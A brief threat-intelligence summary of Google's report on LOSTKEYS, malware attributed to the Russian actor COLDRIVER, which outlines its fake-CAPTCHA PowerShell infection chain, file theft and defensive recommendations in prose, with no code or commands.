Google’s Threat Intelligence Group has uncovered a new malware called LOSTKEYS, developed by the Russian threat actor COLDRIVER. The malware is capable of stealing files, exfiltrating system information, and monitoring processes, representing an escalation in cyber-espionage activities. (Affected: targeted systems and organizations experiencing COLDRIVER’s cyber-espionage campaigns)
Keypoints :
- LOSTKEYS is a stealthy malware used by the Russian threat actor COLDRIVER to steal files, system information, and monitor running processes.
- The infection chain begins with social engineering via a fake CAPTCHA page prompting users to execute PowerShell commands.
- After verification, PowerShell scripts fetch and run malicious payloads from remote servers, evading virtual environments by calculating system hashes.
- The final payload is a Visual Basic Script that specifically targets certain file types and directories for document theft.
- Earlier versions of LOSTKEYS were disguised as Maltego installers, indicating a longer-term low-profile operation dating back to December 2023.
- COLDRIVER has previously targeted high-profile individuals and expanded beyond phishing to include malware deployment.
- Google recommends robust cybersecurity practices such as enrolling in Google’s Advanced Protection Program and implementing strict device security measures.